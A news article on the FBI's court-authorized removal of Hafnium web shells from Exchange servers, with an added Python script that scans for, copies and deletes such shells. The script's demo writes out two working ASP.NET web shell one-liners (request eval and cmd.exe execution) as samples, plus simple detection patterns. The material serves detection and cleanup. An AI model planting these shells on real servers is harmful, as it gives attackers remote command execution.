
Even the FBI is hacking backdoored Exchange servers… but only to remove the backdoors for good


The FBI is accessing computers and servers infected with web shells (backdoors) left by attackers linked to the Chinese government during the Microsoft Exchange Server attacks that were publicly disclosed in early March. Rather than spying on the victims, the FBI's stated goal is to copy each web shell as evidence and then delete it.

Attacks against servers running Microsoft Exchange Server grew 1,048% in the week after the vulnerabilities were identified by the Microsoft Threat Intelligence Center (MSTIC). The FBI operation was authorized by a federal court, according to the United States Department of Justice (DOJ).

“The Department of Justice today announced a court-authorized operation to copy and remove malicious web shells from hundreds of vulnerable computers in the United States that run on-premises versions of the Microsoft Exchange Server software used to provide enterprise-level email service,” the DOJ writes in a press release published on Tuesday, April 13.

Microsoft, which named the group Hafnium, assesses it to be state-sponsored and operating out of China, although it carries out its intrusions mainly from leased virtual private servers in the United States; its main objective is espionage. In the USA, more than 30,000 organizations are estimated to have been compromised, among them government agencies, government contractors, military organizations and banks.

FBI operation against Hafnium

The FBI operation does not exploit the Exchange vulnerabilities afresh; it uses the attackers' own web shells. Each shell is identified by its unique file path, and agents send a command through it that instructs the server to delete only that file. Before removal the shell is copied, so the operation both records evidence of the intrusion and closes the backdoor the attackers left behind.

“The court-authorized removal of malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” said Assistant Attorney General John C. Demers of the DOJ’s National Security Division.

Although the FBI operation removes the web shells left by the attackers, it neither patches the Exchange vulnerabilities nor searches for or removes any other malware or tools the intruders may have installed. In other words, a victim who does not update Microsoft Exchange remains exposed to the same kind of attack, and any additional persistence the attackers established stays in place. For this reason, the FBI said it is contacting victims so that they patch their on-premises servers.
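To make the "copy and remove" step concrete, here is an added example (not the FBI's tool, nor code from the DOJ or Microsoft) that scans an Exchange web root for ASP.NET web shells, hashes and copies each hit into an evidence directory, and then deletes only that file. The indicator patterns, the directory layout and the sample `.aspx` files are all constructed for this example and stand in for a vetted IOC list; like the FBI operation, it leaves the Exchange vulnerabilities themselves unpatched.

```python
"""Find, copy and remove suspicious ASP.NET web shells under an Exchange web root.

Added illustration only: a minimal stand-in for the "copy and remove" step
described in the article, not the FBI's tool. Patterns, paths and sample files
are constructed for this example.
"""
import hashlib
import re
import shutil
import tempfile
from pathlib import Path

# Constructed indicators of the one-line ASP.NET shells seen in the 2021 Exchange
# campaign: script evaluated straight from the request, a process spawned from a
# page, or a JScript page where none should exist. Real triage needs a vetted list.
SHELL_PATTERNS = [
    re.compile(r"eval\s*\(\s*Request\b", re.IGNORECASE),
    re.compile(r"Process\.Start\s*\(", re.IGNORECASE),
    re.compile(r'Language\s*=\s*"Jscript"', re.IGNORECASE),
]


def scan_for_web_shells(webroot: Path) -> list[Path]:
    """Return every .aspx/.asmx file under webroot whose content matches an indicator."""
    hits = []
    for path in sorted(webroot.rglob("*")):
        if path.suffix.lower() not in (".aspx", ".asmx"):
            continue
        text = path.read_text(errors="replace")
        if any(p.search(text) for p in SHELL_PATTERNS):
            hits.append(path)
    return hits


def quarantine_web_shell(path: Path, webroot: Path, evidence_dir: Path) -> dict:
    """Hash and copy the shell into the evidence directory, then delete only that file."""
    digest = hashlib.sha256(path.read_bytes()).hexdigest()
    rel = path.relative_to(webroot)
    copy = evidence_dir / rel
    copy.parent.mkdir(parents=True, exist_ok=True)
    shutil.copy2(path, copy)  # keeps the original timestamps on the evidence copy
    path.unlink()             # remove the shell and nothing else; no patching happens here
    return {"path": rel.as_posix(), "sha256": digest, "evidence_copy": copy.as_posix()}


def demo() -> dict:
    """Build a constructed Exchange web root, run scan and quarantine, and report the outcome."""
    root = Path(tempfile.mkdtemp())
    webroot, evidence = root / "wwwroot", root / "evidence"
    samples = {
        # China Chopper-style one-liner: evaluates whatever arrives in a request parameter.
        "aspnet_client/system_web/aaa.aspx":
            '<%@ Page Language="Jscript"%><%eval(Request.Item["param"],"unsafe");%>',
        # Command-execution shell dropped next to the OWA logon pages.
        "owa/auth/errorFF.aspx":
            '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe", Request.Form["c"]); %>',
        # Benign page that only echoes a request value and must be left untouched.
        "owa/auth/logon.aspx":
            '<%@ Page Language="C#" %><html><body><%= Request.QueryString["url"] %></body></html>',
    }
    for rel, body in samples.items():
        f = webroot / rel
        f.parent.mkdir(parents=True, exist_ok=True)
        f.write_text(body)

    records = [quarantine_web_shell(p, webroot, evidence) for p in scan_for_web_shells(webroot)]
    return {
        "flagged": sorted(r["path"] for r in records),
        "still_present": [r["path"] for r in records if (webroot / r["path"]).exists()],
        "evidence_ok": all(Path(r["evidence_copy"]).is_file() for r in records),
        "benign_untouched": (webroot / "owa/auth/logon.aspx").is_file(),
    }


if __name__ == "__main__":
    print(demo())
```

The evidence copy plus SHA-256 is what lets a later investigation tie the removed file to a known shell family; deleting by exact path mirrors the court order's limit to the web shell itself. After such a cleanup the server still needs the Exchange security updates and a broader hunt for any other persistence the attackers left.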

“Combating cyber threats requires partnerships with private sector and government colleagues … We will continue to do so in coordination with our partners and with the court to combat the threat until it is alleviated, and we can further protect our citizens from these malicious cyber breaches,” said Acting U.S. Attorney Jennifer B. Lowery.

The assistant director of the FBI’s Cyber Division described the operation as “a reminder to cyber criminals that the FBI will impose risk and consequences for cyber intrusions that threaten the national security and public safety of the American people.”

Sources: US Department of Justice; The Hack (1) and (2).
